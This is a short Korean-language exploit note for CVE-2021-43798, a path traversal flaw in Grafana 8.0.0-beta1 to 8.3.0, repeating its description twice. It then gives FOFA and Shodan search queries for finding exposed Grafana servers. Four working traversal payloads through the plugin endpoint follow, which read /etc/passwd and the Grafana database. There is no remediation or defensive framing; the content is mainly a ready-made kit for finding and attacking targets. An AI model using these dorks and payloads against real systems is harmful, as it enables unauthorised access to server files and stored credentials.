
CVE-2021-43798은 Grafana 버전 8.0.0-beta1부터 8.3.0에 영향을 미치는 높은 심각도의 경로 탐색 취약점(CVSS 3.1 점수: 7.5)입니다. /public/plugins/:pluginId 엔드포인트의 부적절한 삭제를 악용하여 인증되지 않은 공격자가 서버에서 임의의 파일을 읽을 수 있습니다.
CVE-2021-43798은 Grafana 8.0.0-beta1부터 8.3.0까지 영향을 미치는 높은 심각도의 경로 탐색 취약점입니다(CVSS 3.1 점수: 7.5). 이 취약점은 /public/plugins/:pluginId 엔드포인트의 부적절한 위생 처리를 악용하여 인증되지 않은 공격자가 서버에서 임의 파일을 읽을 수 있도록 합니다.
dork :
fofa : title="Grafana" && port="3000" shodan : http.title:"Grafana" port:3000
payload :
/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd /public/plugins/mysql/../../../../../../../../../../../../etc/passwd /public/plugins/mysql/../../../../../../../../../../../../var/lib/grafana/grafana.db /public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fgrafana%2Fgrafana.db